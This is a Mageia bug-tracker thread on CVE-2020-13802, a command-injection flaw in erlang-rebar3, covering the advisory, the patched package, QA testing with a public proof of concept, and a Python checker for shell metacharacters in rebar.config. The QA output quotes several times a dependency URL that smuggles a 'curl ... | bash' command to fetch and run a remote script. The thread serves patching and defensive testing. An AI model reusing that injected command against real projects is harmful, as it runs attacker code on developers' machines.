This package has a mga7 suffix under Cauldron/Mageia 8. Assigning to package maintainer.
Rebar3 versions 3.0.0-beta.3 to 3.13.2 are vulnerable to OS command injection via URL parameter of dependency specification.
QA Contact: (none) => security
Component: RPM Packages => Security
CVE: (none) => CVE-2020-13802
URL: (none) => https://nvd.nist.gov/vuln/detail/CVE-2020-13802
CC: (none) => zombie_ryushu
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-13802

Fixed upstream in 3.14.3. Mageia 7 is also affected. Package needs to be dropped from Cauldron before the Mageia 8 release if it is not buildable. Nothing requires it, but I'm not sure about BuildRequires.
Whiteboard: (none) => MGA7TOO
Summary: mga7 suffix for package erlang-rebar3 => erlang-rebar3 new security issue CVE-2020-13802
CC: (none) => jani.valimaa
erlang-rebar3-3.14.3-2.mga8 uploaded for Cauldron by Jani.
Whiteboard: MGA7TOO => (none)
Version: Cauldron => 7
Target Milestone: Mageia 8 => ---
Patched package uploaded by Jani for Mageia 7.

Advisory:
========================

Updated erlang-rebar3 package fixes security vulnerability:

Rebar3 versions 3.0.0-beta.3 to 3.13.2 are vulnerable to OS command injection via URL parameter of dependency specification (CVE-2020-13802).

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-13802
========================

Updated packages in core/updates_testing:
========================
erlang-rebar3-3.9.0-1.1.mga7 from erlang-rebar3-3.9.0-1.1.mga7.src.rpm
Assignee: pkg-bugs => qa-bugs
mga7, x64

Installed erlang-rebar and 63 other packages.

CVE-2020-13802
https://github.com/vulnbe/poc-rebar3

$ git clone https://github.com/vulnbe/poc-rebar3.git
$ cd poc-rebar3
===> Verifying dependencies...
===> Fetching dephelper ({hg,"https://github.com/vulnbe/poc-rebar3-helper.git?repo=main&threadId=19:428af44abb014e318e7d225a4a88acc2@thread.tacv2&ctx=channel|curl\t-fsSL\thttps://gist.githubusercontent.com/vulnbe/6e5ec8fae3bdbee8e5f11f15c1462e48/raw/94616f0ee52935fda458c889d6f686958c79a2c8/poc.sh|bash\t-|git\tclone\thttps://github.com/vulnbe/poc-rebar3-helper.git", "dephelper"})
===> hg not installed
===> Failed to fetch and copy dep: {hg,"https://github.com/vulnbe/poc-rebar3-helper.git?repo=main&threadId=19:428af44abb014e318e7d225a4a88acc2@thread.tacv2&ctx=channel|curl\t-fsSL\thttps://gist.githubusercontent.com/vulnbe/6e5ec8fae3bdbee8e5f11f15c1462e48/raw/94616f0ee52935fda458c889d6f686958c79a2c8/poc.sh|bash\t-|git\tclone\thttps://github.com/vulnbe/poc-rebar3-helper.git", "dephelper"}

Enabled updates-testing.

$ sudo urpmi.update -a

Too early to pick up the update. Continuing this thread later.
CC: (none) => tarazed25
Oops. Forgot to cut-and-paste 'rebar3 clean'.

$ git clone https://github.com/vulnbe/poc-rebar3.git
$ cd poc-rebar3
$ rebar3 clean

Updated the package.

$ rebar3 clean
===> Verifying dependencies...
$

Guessing that we are not required to exercise erlang in its entirety. This test shows that rebar3 is working as expected.
Whiteboard: (none) => MGA7-64-OK
Whiteboard: MGA7-64-OK => (none)
Retrace. Failed to check the poc-rebar3 directory.

$ git clone https://github.com/vulnbe/poc-rebar3.git
$ cd poc-rebar3
$ ls
LICENSE README.md rebar.config src/
$ rebar3 clean
===> Verifying dependencies...
===> Fetching dephelper ({hg,"https://github.com/vulnbe/poc-rebar3-helper.git?repo=main&threadId=19:428af44abb014e318e7d225a4a88acc2@thread.tacv2&ctx=channel|curl\t-fsSL\thttps://gist.githubusercontent.com/vulnbe/6e5ec8fae3bdbee8e5f11f15c1462e48/raw/94616f0ee52935fda458c889d6f686958c79a2c8/poc.sh|bash\t-|git\tclone\thttps://github.com/vulnbe/poc-rebar3-helper.git", "dephelper"})
===> hg not installed
===> Failed to fetch and copy dep: {hg,"https://github.com/vulnbe/poc-rebar3-helper.git?repo=main&threadId=19:428af44abb014e318e7d225a4a88acc2@thread.tacv2&ctx=channel|curl\t-fsSL\thttps://gist.githubusercontent.com/vulnbe/6e5ec8fae3bdbee8e5f11f15c1462e48/raw/94616f0ee52935fda458c889d6f686958c79a2c8/poc.sh|bash\t-|git\tclone\thttps://github.com/vulnbe/poc-rebar3-helper.git", "dephelper"}

No change apparently. No changes to the directories. Running 'rebar3 clean' again returns the same messages. The rebar.config file contains what appears to be the OS injection code. My take on this is that the attack was rejected both before and after the update, which probably validates erlang-rebar. Waiting for comments.
Note that after installing mercurial hg was available but the poc messages were unchanged.
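A defender-side check for the dependency-spec pattern the test above exercises (a git/hg URL in rebar.config carrying shell metacharacters, which rebar3 3.0.0-beta.3 to 3.13.2 passed to a shell unescaped), added here as example code that belongs neither to rebar3 nor to the Mageia package; the sample rebar.config, its hostnames and the dependency names are constructed.

```python
"""Flag rebar.config VCS dependency URLs that contain shell metacharacters,
the ingredient CVE-2020-13802 relied on (rebar3 3.0.0-beta.3 to 3.13.2
handed git/hg URLs to a shell without escaping).  Example code for this
bug report, not rebar3's own; the sample config below is constructed."""
import re

# Matches the {git|hg, "url" ...} part of a deps entry.  The captured string
# is still Erlang-escaped (\t, \", \\); it is decoded before checking.
DEP_RE = re.compile(r'\{\s*(git|hg)\s*,\s*"((?:[^"\\]|\\.)*)"')

# Characters a shell interprets, plus whitespace: in the public PoC a \t
# separated the words of the injected command after the "|".
SHELL_META = set('|;&$`<>()\'"\\ \t\n')


def unescape_erlang(s: str) -> str:
    """Decode the Erlang string escapes that matter for this check."""
    return re.sub(r'\\(.)',
                  lambda m: {'t': '\t', 'n': '\n'}.get(m.group(1), m.group(1)),
                  s)


def find_suspicious_deps(config_text: str) -> list:
    """Return (vcs, url, offending_chars) for each dep whose URL could not
    safely be placed on an unquoted shell command line."""
    findings = []
    for vcs, raw_url in DEP_RE.findall(config_text):
        url = unescape_erlang(raw_url)
        bad = sorted(set(url) & SHELL_META)
        if bad:
            findings.append((vcs, url, bad))
    return findings


# Constructed sample: one ordinary dep and one shaped like the PoC's dephelper
# entry (a pipe and a tab inside the URL), with placeholder hosts.
SAMPLE_CONFIG = r'''
{deps, [
  {safe_dep, {git, "https://example.invalid/safe_dep.git", {tag, "1.0.0"}}},
  {dephelper, {hg, "https://example.invalid/helper.git?x=1|echo\tinjected", "dephelper"}}
]}.
'''

if __name__ == "__main__":
    for vcs, url, bad in find_suspicious_deps(SAMPLE_CONFIG):
        print(f"{vcs}: {url!r} contains shell metacharacters {bad}")
```

Run it against a checked-out project's rebar.config before `rebar3 clean` or `rebar3 compile` is invoked, which is the point at which the affected versions fetched dependencies.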
If nobody objects I shall give this the green light.
Validating Advisory pushed to SVN.
CC: (none) => sysadmin-bugs
Keywords: (none) => advisory, validated_update
An update for this issue has been pushed to the Mageia Updates repository. https://advisories.mageia.org/MGASA-2020-0470.html
Resolution: (none) => FIXED
Status: NEW => RESOLVED